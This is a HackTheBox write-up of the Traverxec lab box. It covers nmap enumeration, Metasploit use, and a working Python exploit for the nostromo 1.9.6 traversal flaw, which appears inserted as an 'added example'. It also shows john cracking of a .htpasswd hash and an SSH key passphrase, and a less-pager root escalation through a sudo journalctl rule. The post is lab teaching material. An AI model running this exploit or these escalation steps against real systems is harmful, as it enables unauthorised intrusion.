Traverxec Hackthebox Writeup

Shubham Arya
4 min read · Apr 12, 2020

# About

Hello everyone, this is the write-up for the Traverxec box on HackTheBox. It is a genuinely easy box, more CTF-style than realistic: a known web server vulnerability for the foothold, a credential chain for user, and a misconfigured sudo rule for root. So let’s get started.

# Basic Info

  • Name: Traverxec
  • IP: 10.10.10.165
  • Level: Easy
  • Box: Linux

# Enumeration

  • We perform an nmap scan on the machine and get the following results
    nmap -sC -sV -oN nmap.txt -v 10.10.10.165
Nmap scan results showing open ports with services running on them.
  • On port 80 we see the service ‘nostromo 1.9.6’ running.
  • OpenSSH on port 22 is a recent version with no known public exploit, so the web server is the interesting target.
  • We run a full port scan in the background while we examine the nostromo service.
    nmap -sC -sV -v -p- -oN allports.txt 10.10.10.165

# Foothold (Web-shell)

  • Let’s look for an exploit of the nostromo service running on the box
    searchsploit nostromo
  • We found an exploit, now we open metasploit to run it.
    sudo msfconsole
  • Search for the module and select it
    search nostromo
    use exploit/multi/http/nostromo_code_exec
  • We tweak the exploit options as follows
    set rhosts 10.10.10.165
    set lhost tun0
    set srvhost tun0
  • Run the exploit
    exploit
  • We get a shell..!!
  • The shell we get is not a TTY, so we upgrade it by spawning a pseudo-terminal with python and setting a terminal type
    python3 -c 'import pty;pty.spawn("/usr/bin/sh")'
    export TERM=xterm
  • Now we have a proper interactive shell on the box…!!
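What the Metasploit module does under the hood is a single crafted HTTP request, and it is worth seeing it without the framework. The following is an added example (not code from the original write-up or from the Metasploit module itself) that reproduces the technique the module uses against nostromo 1.9.6 (CVE-2019-16278): the server does not reject a URL-encoded carriage return (`%0d`) inside a path segment, so `/.%0d./` steps out of the web root, the request lands on `/bin/sh`, and the POST body is handed to that shell. The `Content-Length: 1` header and the two leading `echo` lines are taken from the public proof of concept; the target host and port are assumptions for illustration.

```python
import socket

# Added example: raw reproduction of the request behind the
# exploit/multi/http/nostromo_code_exec module (CVE-2019-16278).
# nostromo 1.9.6 fails to reject "%0d" in path segments, so each "/.%0d./"
# is a disguised "../" that escapes the document root.
TRAVERSAL = "/.%0d./.%0d./.%0d./.%0d./bin/sh"


def build_request(cmd: str) -> bytes:
    """Build the HTTP/1.0 POST that nhttpd 1.9.6 turns into a shell command.

    The body becomes stdin of /bin/sh on the target. As in the public PoC,
    Content-Length is deliberately set to 1 and two 'echo' lines precede the
    command; the shell consumes them before running it. '2>&1' folds stderr
    into the response so errors are visible too.
    """
    body = f"echo\necho\n{cmd} 2>&1"
    headers = (
        f"POST {TRAVERSAL} HTTP/1.0\r\n"
        "Content-Length: 1\r\n"
        "\r\n"
    )
    return (headers + body).encode()


def extract_body(raw: bytes) -> bytes:
    """Return the command output from a raw response.

    The shell writes straight to the socket, so there may be no HTTP header
    block at all; if one is present, strip it.
    """
    if raw.startswith(b"HTTP/") and b"\r\n\r\n" in raw:
        return raw.split(b"\r\n\r\n", 1)[1]
    return raw


def run(host: str, cmd: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the crafted request and return the command output (network call)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(cmd))
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return extract_body(b"".join(chunks))


if __name__ == "__main__":
    # Assumed target; on the box this returns the web server's uid (constructed usage).
    print(run("10.10.10.165", "id").decode(errors="replace"))
```

The shell you get this way is the one nhttpd runs as, the same low-privilege account the Metasploit session lands in, so the privilege escalation steps below are unchanged.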

# Exploitation(User)

  • Now looking around the box we find the directory ‘/var/nostromo/conf/’
  • We cat the files present in it and gather some interesting information
  • We find a ‘.htpasswd’ file containing a username and a password hash. We copy it to our system.
  • We crack it using john
    john --wordlist=/usr/share/wordlists/rockyou.txt .htpasswd
  • The cracked hash reveals the password : Nowonly4me
  • We try to log in over SSH using these credentials but it fails, so the hash protects something else. Let’s look somewhere else.
  • Closely examining the ‘/var/nostromo/conf/nhttpd.conf’ file we see that there is a public_www directory listed.
    cd /home/david/public_www
  • We look at the contents of the directory
    ls -laR
  • I read the documentation of nostromo: the homedirs setting in nhttpd.conf exposes a user’s home directory over the web under a URL of the form ‘/~username/’, restricted to the subdirectory named by homedirs_public (here public_www).
  • Then we open the following url in a browser
    http://10.10.10.165/~david/public_www/private-file-storage/backup-ssh-identity-files.tgz
  • The directory is protected with HTTP Basic authentication (this is what the .htpasswd file we cracked is for). We enter david’s username with the password we previously cracked (Nowonly4me) and we get the file!
  • Extracting the archive gives us a backup of david’s home directory, and inside it we find an SSH private key!!
  • The key is passphrase-protected, so first we convert it to a john-compatible hash
    ssh2john id_rsa > hash.hash
  • Then we crack this using john and get the passphrase ‘hunter’
    john --wordlist=/usr/share/wordlists/rockyou.txt hash.hash
  • Finally we have a usable key. We log in as david using the private key and enter the passphrase when prompted
    ssh -i id_rsa david@10.10.10.165
  • We get the user shell..and find the user.txt file
    cat ~/user.txt

# Exploitation (Root)

  • Looking in the home directory of user david, we see a bin folder.
  • Inside it there are two files, a banner and a shell script.
  • We closely look at the shell script and see that it runs /usr/bin/journalctl with sudo, so user david is allowed to run that exact command as root without a password..!!
  • We go to GTFOBins to look for a privesc using the command (journalctl) that we can run as sudo: journalctl hands its output to the less pager, and less can spawn a shell.
  • So we run the command exactly as it appears in the script (the sudo rule only matches that command line)
    /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
  • journalctl only starts the pager when the output does not fit on the screen, so if the five lines are printed without a pager, shrink the terminal window until they do not fit and run it again. Then at the less prompt we enter
    !/bin/sh
  • Since less is running as root, so is the shell it spawns. And we get root..!!!
    cat /root/root.txt

# Concepts we learned

  • Searching for exploits using searchsploit.
  • How nostromo maps ‘/~user/’ URLs to user home directories and protects them with .htpasswd.
  • We discovered this awesome website, GTFOBins.
  • How to use ‘less’ to get a root shell when it is running as root.
  • How to crack hashes using john.

# Conclusion

This was my way to root the box, if there’s a better way to pwn this, feel free to respond :)
Have a great day, Happy Hacking.!!


Shubham Arya

Cyber Security Enthusiast | Computer Science Engineering Student | Bug Bounty Newbie | CTF Player